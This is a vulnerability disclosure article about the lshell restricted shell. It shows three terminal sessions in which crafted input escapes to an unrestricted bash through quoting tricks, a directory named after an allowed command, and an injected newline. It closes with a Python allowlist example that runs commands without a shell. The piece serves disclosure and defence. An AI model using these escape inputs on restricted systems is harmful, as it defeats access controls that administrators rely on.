
0day vulnerabilities in lshell

lshell is a shell that restricts the commands and file system paths available to the user. It is recommended as an alternative to a complex chroot setup:

and so on; many sources recommend it for use.

The application is available in the repositories of Ubuntu, Debian and EPEL.

Problems in the code

A quick look at the comments on lshell in its configuration files shows that some of the restrictions lshell imposes exist to simplify command parsing rather than to increase security; for example, the bans on semicolons and subshells. It therefore makes sense to look at how this parsing is implemented.

Examining the source code makes it clear that the command to be launched and its arguments are selected by the library , which is designed for parsing simple CLI input and does not correctly parse complex shell command syntax. At the same time, despite the warning in the documentation , after a simple validation the command is passed to the shell /bin/sh. The validation deserves special attention; it rests on the assumptions that:

There is no real syntax parsing anywhere, so this is not an exhaustive list of the assumptions the check makes.
Consequences

The following scenarios allow escaping from this restricted shell.
Scenario 1: exploiting problems with quotes and command chains
 vladislav@dt1:~$ getent passwd testuser
 testuser:x:1002:1003:,,,:/home/testuser:/usr/bin/lshell
 vladislav@dt1:~$ su - testuser
 Password: 
 You are in a limited shell.
 Type '?' or 'help' to get the list of allowed commands
 testuser:~$ ?
 cd clear echo exit help history ll lpath ls lsudo
 testuser:~$ ls
 examples.desktop
 testuser:~$ which bash
 *** forbidden command: which
 testuser:~$ ls'usb'
 Bus 002 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
 Bus 001 Device 006: ID 046d:c05a Logitech, Inc. M90/M100 Optical Mouse
 Bus 001 Device 002: ID 046d:c31c Logitech, Inc. Keyboard K120
 Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
 testuser:~$ echo && 'bash'

 testuser@dt1:~$ PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
 testuser@dt1:~$ reboot --help
 reboot [OPTIONS...] [ARG]

 Reboot the system.

      --help Show this help
      --halt Halt the machine
   -p --poweroff Switch off the machine
      --reboot Reboot the machine
   -f --force Force immediate halt/power-off/reboot
   -w --wtmp-only Don't halt/power-off/reboot, just write wtmp record
   -d --no-wtmp Don't write wtmp record
      halt/power-off/reboot

GH Issue

Scenario 2: running a script from the home directory via a path that begins with the name of an allowed command
 vladislav@dt1:~$ su - testuser
 Password: 
 You are in a limited shell.
 Type '?' or 'help' to get the list of allowed commands
 testuser:~$ ?
 cd clear echo exit help history ll lpath ls lsudo
 testuser:~$ echo'/1.sh'
 testuser@dt1:~$ cat echo/1.sh 
 #!/bin/bash

 /bin/bash
 testuser@dt1:~$ 

GH Issue

Scenario 3: using special terminal sequences
It is enough to start a command with any allowed word, insert a line feed by pressing the two key combinations <CTRL+V> <CTRL+J> in sequence, and enter the desired command on the new line.

 vladislav@dt1:~$ getent passwd testuser
 testuser:x:1001:1002:,,,:/home/testuser:/usr/bin/lshell
 vladislav@dt1:~$ su - testuser
 Password: 
 You are in a limited shell.
 Type '?' or 'help' to get the list of allowed commands
 testuser:~$ ?
 cd clear echo exit help history ll lpath ls lsudo
 testuser:~$ bash
 *** forbidden command: bash
 testuser:~$ echo <CTRL+V><CTRL+J>
 bash

 testuser@dt1:~$ which bash
 /bin/bash

GH Issue
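As an added example (written for this article, not lshell's own code), this is the design the problems above point to: tokenise the line with Python's shlex, check the first word against an allowlist, and exec the resulting argv directly instead of handing the line to /bin/sh. The allowlist is constructed for the example; fed the inputs from the three scenarios, each is either rejected or runs the allowed program with the rest of the line as inert arguments.

```python
import shlex
import shutil
import subprocess

# Constructed allowlist for this example (command name -> absolute path),
# not lshell's configuration format. shutil.which resolves the real paths.
ALLOWED = {name: shutil.which(name) for name in ("ls", "echo")}


def resolve(line: str, allowed: dict = ALLOWED) -> list:
    """Map one input line to an argv list or raise ValueError.

    The line is tokenised with POSIX quoting rules and the result is executed
    as argv, never handed to /bin/sh. Quotes therefore only join or split
    words, '&&' and ';' are ordinary arguments, and a newline is plain
    whitespace: the only program that can ever run is allowed[argv[0]].
    """
    try:
        argv = shlex.split(line, posix=True)
    except ValueError as exc:  # unbalanced quotes and similar
        raise ValueError(f"unparseable input: {exc}") from exc
    if not argv:
        raise ValueError("empty command")
    if argv[0] not in allowed or allowed[argv[0]] is None:
        raise ValueError(f"forbidden command: {argv[0]}")
    return [allowed[argv[0]]] + argv[1:]


def is_allowed(line: str) -> bool:
    """True if the line resolves to an allowlisted program."""
    try:
        resolve(line)
    except ValueError:
        return False
    return True


def run(line: str) -> subprocess.CompletedProcess:
    """Execute the resolved argv directly, with no shell in between."""
    return subprocess.run(resolve(line), capture_output=True, text=True, check=False)


if __name__ == "__main__":
    # The inputs from the three scenarios in the article.
    for line in ("ls'usb'", "echo && 'bash'", "echo'/1.sh'", "echo\nbash"):
        if is_allowed(line):
            print(repr(line), "->", resolve(line))
        else:
            print(repr(line), "-> rejected")
```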

The best solution

This software is too far from a state in which it can be used safely, so the best course is to stop using it.

Source: https://habr.com/ru/post/308028/